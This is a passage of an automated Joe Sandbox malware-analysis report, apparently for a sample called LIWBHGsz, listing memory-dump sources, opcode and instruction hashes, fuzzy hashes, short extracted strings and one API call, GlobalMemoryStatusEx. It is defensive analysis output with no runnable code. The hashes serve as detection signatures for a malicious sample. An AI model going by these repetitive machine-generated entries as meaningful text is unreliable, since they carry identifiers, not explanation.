                                                                                                                                  • Opcode Fuzzy Hash: 906a968808cbe5a2624390f335fc01b5f853bc0beb19ece1b2f0c97d587b4ae7
                                                                                                                                  • Instruction Fuzzy Hash: 59027B30E1020A8FDFA4DF69D6806ADB7B2FB45310F24856AD405EB395DB34EE85CB91

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-2881790790
                                                                                                                                  • Opcode ID: fda9fdf882054eb4b51595caee433808155bc049090fa690d041770628c36c1e
                                                                                                                                  • Instruction ID: 5dd5b510541b53928bfca2a2c3050dd432ed6686d84c1ad65ecbc4fe500e2e9d
                                                                                                                                  • Opcode Fuzzy Hash: fda9fdf882054eb4b51595caee433808155bc049090fa690d041770628c36c1e
                                                                                                                                  • Instruction Fuzzy Hash: 6C913130F1020A8FDF64DF66D9507AEB7F6EF84240F108569D40AAB398EA74ED41CB90

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq
                                                                                                                                  • API String ID: 0-2086306503
                                                                                                                                  • Opcode ID: 3eb350d2b244400fb6731e321b8d08f16852a8eb162bbf88ed2b856f49e45fad
                                                                                                                                  • Instruction ID: 776a095d3b7a059407efa3a89ae1b113e6912399e251d8738c7c97af0d91997a
                                                                                                                                  • Opcode Fuzzy Hash: 3eb350d2b244400fb6731e321b8d08f16852a8eb162bbf88ed2b856f49e45fad
                                                                                                                                  • Instruction Fuzzy Hash: 27624070A102068FCB55DF69D690A5EB7B2FF84300B208A69D4169F369DB75FD86CB80

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: fpq$XPpq$\Opq
                                                                                                                                  • API String ID: 0-2571271785
                                                                                                                                  • Opcode ID: 173458369c9fa012948c78f59aa059b83183deeeb745c1a6eebb4c7c539c466d
                                                                                                                                  • Instruction ID: fb4231fb4a7bf12a7efa06737da2fef4085abadbebfd1849b14649e908544cc6
                                                                                                                                  • Opcode Fuzzy Hash: 173458369c9fa012948c78f59aa059b83183deeeb745c1a6eebb4c7c539c466d
                                                                                                                                  • Instruction Fuzzy Hash: 3E615071F002099FEB549FA5C854BAEBBF6FB88700F20852ED606AB394DA754D45CB90

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq
                                                                                                                                  • API String ID: 0-3550614674

                                                                                                                                  Control-flow Graph (function 309eb30-309ecbd; calls 309e730 and GlobalMemoryStatusEx)
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4258817348.0000000003090000.00000040.00000800.00020000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_3090000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:

                                                                                                                                  APIs
                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0309EC7F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4258817348.0000000003090000.00000040.00000800.00020000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_3090000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1890195054-0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: XPpq
                                                                                                                                  • API String ID: 0-1266478781
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: PHkq
                                                                                                                                  • API String ID: 0-902561536
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: PHkq
                                                                                                                                  • API String ID: 0-902561536
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4b27473e7ff7dfb40d63b5d045a231c26c76d71940f8931fae8f9e4a5f46935c
                                                                                                                                  • Instruction ID: d243aee37e9d11fc5ac6cf01d85d8bbca792665577f4c58f95beeca52d62facb
                                                                                                                                  • Opcode Fuzzy Hash: 4b27473e7ff7dfb40d63b5d045a231c26c76d71940f8931fae8f9e4a5f46935c
                                                                                                                                  • Instruction Fuzzy Hash: A951EA70F203048FEF64576CDA6076F36AEE789750F20082ED51AD73A4D96ACD85C3A2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2e524dd3619d65d10b6b7c84425a3d24130f3cf58abea54f55e2ef6c560a6755
                                                                                                                                  • Instruction ID: dcf63fc03d18bd9cf4e9ddcaa93405a0bc19c0dbb991da7e9a05fbb18d721665
                                                                                                                                  • Opcode Fuzzy Hash: 2e524dd3619d65d10b6b7c84425a3d24130f3cf58abea54f55e2ef6c560a6755
                                                                                                                                  • Instruction Fuzzy Hash: 2451D570F202048FEF64676DDA6476F366EE789750F20082ED51AD73A4C96ACD85C3A2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6aa41d5b483e21c5bd99bd35261f9e8088088e1897d98a2fa996c9dbdac2f47a
                                                                                                                                  • Instruction ID: 777a48757c7fa270d22f230de7ff0e8de2fcb98eacbf5822b703dd4250792ab5
                                                                                                                                  • Opcode Fuzzy Hash: 6aa41d5b483e21c5bd99bd35261f9e8088088e1897d98a2fa996c9dbdac2f47a
                                                                                                                                  • Instruction Fuzzy Hash: 1A417C71E006098FDF70CFA9C881AAFFBF2EB85314F50492AD256D7250D332E9498B90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b86027cadade1596e7f9d801f52c175aa2c7532513b508b1dc730977cce82ddb
                                                                                                                                  • Instruction ID: b747db14cc23eb3ceb3c5b44c60b01a92335249d3a5fedf9b4f15f319322a7e4
                                                                                                                                  • Opcode Fuzzy Hash: b86027cadade1596e7f9d801f52c175aa2c7532513b508b1dc730977cce82ddb
                                                                                                                                  • Instruction Fuzzy Hash: 7F41B475E102058FDF70CB68C880A7EFBB2FB45314FA4C92AD559DB241C635DA51CB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8ac7a2e6948c3470fc3459ea13347da804ba84af6612038cf37b4a2eb60e633e
                                                                                                                                  • Instruction ID: fba285c4d3d00b7099bba4ccb4e5f7bc70ce4f125bb0a0fc5540099c95f27802
                                                                                                                                  • Opcode Fuzzy Hash: 8ac7a2e6948c3470fc3459ea13347da804ba84af6612038cf37b4a2eb60e633e
                                                                                                                                  • Instruction Fuzzy Hash: 7331AF30E1020A9BDB44CFA5D844AAEBBF6FF88310F108529E906A7350DB75EE46CB50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 72a9129ec051353d42c2f7f442ef9289ef833e10eb3ff7c99cd114ff4c60934b
                                                                                                                                  • Instruction ID: 13273a7614541056f4f0f4e8aa72de60979da7f9c4ca1319e40135567e7b44ec
                                                                                                                                  • Opcode Fuzzy Hash: 72a9129ec051353d42c2f7f442ef9289ef833e10eb3ff7c99cd114ff4c60934b
                                                                                                                                  • Instruction Fuzzy Hash: AD319C31E1020A9BDB58CFA5C858A9EBBF6FF88310F108529E906E7354DB75EE45CB50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4b737286df31f0f10dfd9be32179ed60a091dcc63b88a7e425c4c9345c52245a
                                                                                                                                  • Instruction ID: 40b89af5f9cce1cb0d4b4815e4d2f0c5e120d61421dd69b4f3f89d1ac38cdfec
                                                                                                                                  • Opcode Fuzzy Hash: 4b737286df31f0f10dfd9be32179ed60a091dcc63b88a7e425c4c9345c52245a
                                                                                                                                  • Instruction Fuzzy Hash: 5C21AD34F00605AFDB50DF6AD980AAEBBF5EB48310F004029E906E7350E734ED818B94
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 00ea39b727a13b8d164bb6e7a169a178078083d6acdfe939c63c706d1a1e1156
                                                                                                                                  • Instruction ID: 8cb9afba1afcbb1e01c1c207dc8a0812ab1843e9d190637469ca1f7270cfef1a
                                                                                                                                  • Opcode Fuzzy Hash: 00ea39b727a13b8d164bb6e7a169a178078083d6acdfe939c63c706d1a1e1156
                                                                                                                                  • Instruction Fuzzy Hash: 6D218C75F006159FDB50DF6AD980AAEB7F1EB48610F10842AE90AE7390E735ED41CB94
Memory Dump Source
• Source File: 0000000E.00000002.4258225128.0000000002ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ECD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2ecd000_LIWBHGsz.jbxd
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 90ed13a191aaee2c513246ad9447d046fe38bb9e4f36084c19f829dcc72abd97
                                                                                                                                  • Instruction ID: 7b21062c6ea0c936242e45d440b43403a9788b84477daac5642b33b8407793ea
                                                                                                                                  • Opcode Fuzzy Hash: 90ed13a191aaee2c513246ad9447d046fe38bb9e4f36084c19f829dcc72abd97
                                                                                                                                  • Instruction Fuzzy Hash: 9701D430B002005FEB619A79D598B1EBBE6EB86610F10882DE64AC7391EE35DD468395
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9d41387fea73e7495e37f72a74a88403236f301c8fa8e61252fdc00fab51cd1c
                                                                                                                                  • Instruction ID: c347bffadef5a706364f14a39606517d329eb9317802fe4808df68bed92bff87
                                                                                                                                  • Opcode Fuzzy Hash: 9d41387fea73e7495e37f72a74a88403236f301c8fa8e61252fdc00fab51cd1c
                                                                                                                                  • Instruction Fuzzy Hash: B7014231B001510FDB658A3D9864B2F7BE6CBCDA60F04882EF10AC7391DA21CE0283D4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4258225128.0000000002ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ECD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_2ecd000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction ID: 8f604390e65e0d13749a9f64782c3af3124553593683916048062f8705695556
                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction Fuzzy Hash: 0A11AC755442448FCB11CF54CAC4B16BB62FB44228F24C6AEE8494B652C33BD44ACB61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4258225128.0000000002ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ECD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_2ecd000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                  • Instruction ID: 46b719f0183e7cef54c8b5346c3501911dee2c382a2c126f6cca947793e020bc
                                                                                                                                  • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                  • Instruction Fuzzy Hash: B711D075544284DFDB06CF50DAC4B56BBA1FB84228F24C6AED8490B646C33AD40ACB51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4258225128.0000000002ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ECD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_2ecd000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction ID: a279273d44eb6f8eed6d3fb97dc8ab9df88099f79a84729033347901bad37d32
                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction Fuzzy Hash: 7E11BB75544280CFCB05CF50DAC4B15BBA2FB84218F24C6AED9494B256C33BE44ACBA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fa5842afd087a59ad88f0f85572f77159bb73f38de5b44a90929b378ac2e30a7
                                                                                                                                  • Instruction ID: 9df93cc5b79b8f447010699f89b026ba0e3c3952154b5149b99833b0bbd1b4de
                                                                                                                                  • Opcode Fuzzy Hash: fa5842afd087a59ad88f0f85572f77159bb73f38de5b44a90929b378ac2e30a7
                                                                                                                                  • Instruction Fuzzy Hash: 4001D234A052484FCB51DF7DE9106AEBBF5EB85204F1041BFD929D7267EB388941C7A2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4ecf6535de5f99665c7186ccb7768543f26daf6d6309a6384812c66854b2bac5
                                                                                                                                  • Instruction ID: 91b30eb8f7b73741d4742f34bfeb798fe300688589ba9063e611642a3c942dc4
                                                                                                                                  • Opcode Fuzzy Hash: 4ecf6535de5f99665c7186ccb7768543f26daf6d6309a6384812c66854b2bac5
                                                                                                                                  • Instruction Fuzzy Hash: 9911B0B5D01259EFCB00DF9AD884ADEFFB4FB49320F50812AE918A7250C374A954CFA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3caebd2945f9172d57fe40e4d768a4ae171cb205b22756052b3779bc618abd65
                                                                                                                                  • Instruction ID: a5c9df44542e8c8680daa761ae44fadd66a3e974b23447bc0f1b7cc812e711e4
                                                                                                                                  • Opcode Fuzzy Hash: 3caebd2945f9172d57fe40e4d768a4ae171cb205b22756052b3779bc618abd65
                                                                                                                                  • Instruction Fuzzy Hash: C3018631B005100BDB589A7D9454B2FB7EADBD9750F20C83EE10BC7354ED65DD424395
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 243cc84adc0159b362d4aef4947bb67a5f1fe23754d2197f8f79314f8468c291
                                                                                                                                  • Instruction ID: 3458a3ed79df98cb4a53361dbd429ca3c8f1376611b19e494b488e19594c7f1a
                                                                                                                                  • Opcode Fuzzy Hash: 243cc84adc0159b362d4aef4947bb67a5f1fe23754d2197f8f79314f8468c291
                                                                                                                                  • Instruction Fuzzy Hash: 9001DF31B040685BDF94AA79DC146AF76FAEBC8610F00493EE50AD7384EE64DC0247E5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8f2a77140c75268aff90ba51810dede370e73937a424904da9696f997a60d8f7
                                                                                                                                  • Instruction ID: e9fa728b1e3717b43869ea20aceaa4ca5fcf15dafa0c042571dfae3a48a68cc8
                                                                                                                                  • Opcode Fuzzy Hash: 8f2a77140c75268aff90ba51810dede370e73937a424904da9696f997a60d8f7
                                                                                                                                  • Instruction Fuzzy Hash: 1801AF31B005114FDB649A7E94A4B2EB7E6DBCDAA0F10883EE20AC7354EE26DD0243D5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1e2d6733ee8163a14ddabdec03d413c19d9b0751991d3ce6a4dcd1dfb6e9949a
                                                                                                                                  • Instruction ID: 8e73ace4ce0ebf8e887b0bcf438e9c8f4d00b2671f8838d5caef6cb6026d6b7d
                                                                                                                                  • Opcode Fuzzy Hash: 1e2d6733ee8163a14ddabdec03d413c19d9b0751991d3ce6a4dcd1dfb6e9949a
                                                                                                                                  • Instruction Fuzzy Hash: FB018130B001145FDB50AA7AD598B2EB7E6E785610F10882DE60AC7354EA25DD458385
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 270dd17d24fa6f55db4bcb568bf16d223494b6bd1a79945257be639d66118582
                                                                                                                                  • Instruction ID: d07766651361a00a84193dd4f0376a6725e248f4d611df3e684d1f8bda064cf4
                                                                                                                                  • Opcode Fuzzy Hash: 270dd17d24fa6f55db4bcb568bf16d223494b6bd1a79945257be639d66118582
                                                                                                                                  • Instruction Fuzzy Hash: 79F0F874A012098FD781EF7DD61026EB7F6EB88200F10827D8929D7769EB749D81CB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3f985364182a36559ef24aff5aa800a1dcb1fbecb1859b07256626890a3d4e2c
                                                                                                                                  • Instruction ID: 66f100316239e94100121a5d448ef461cc691ec3603029895cfdbed7e0afa5ca
                                                                                                                                  • Opcode Fuzzy Hash: 3f985364182a36559ef24aff5aa800a1dcb1fbecb1859b07256626890a3d4e2c
                                                                                                                                  • Instruction Fuzzy Hash: DEE0D871D242885BDF61DE75C915B5ABBF9DB12304F2088EAD448CB242F576CE019391
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1324371161
                                                                                                                                  • Opcode ID: c3bb0c811b76fc1a152da02b2dbe5a948fda4cc52d870832c3f58660739a578a
                                                                                                                                  • Instruction ID: b76db335a3e67518bf9e51d5918bdebf38b8fb776a4094628926ba413d3ee9fe
                                                                                                                                  • Opcode Fuzzy Hash: c3bb0c811b76fc1a152da02b2dbe5a948fda4cc52d870832c3f58660739a578a
                                                                                                                                  • Instruction Fuzzy Hash: D6122D34E01219CFDB64EF69C994A9EB7B6BF88300F208569D509AB364DB349D85CF90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1078448309
                                                                                                                                  • Opcode ID: a7986a35dcc576101842c5e0204d0df1d6a1c6569862df6772385cb9e511909b
                                                                                                                                  • Instruction ID: 8f35b3de04f92078227c95eb5c6f68d651b8b6df838db3b40bfd65d1c9389e6f
                                                                                                                                  • Opcode Fuzzy Hash: a7986a35dcc576101842c5e0204d0df1d6a1c6569862df6772385cb9e511909b
                                                                                                                                  • Instruction Fuzzy Hash: 0B914E30E513099FEB68EFA5D6547AEBBF2EF84300F208529D4019B394DB799D81CB90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
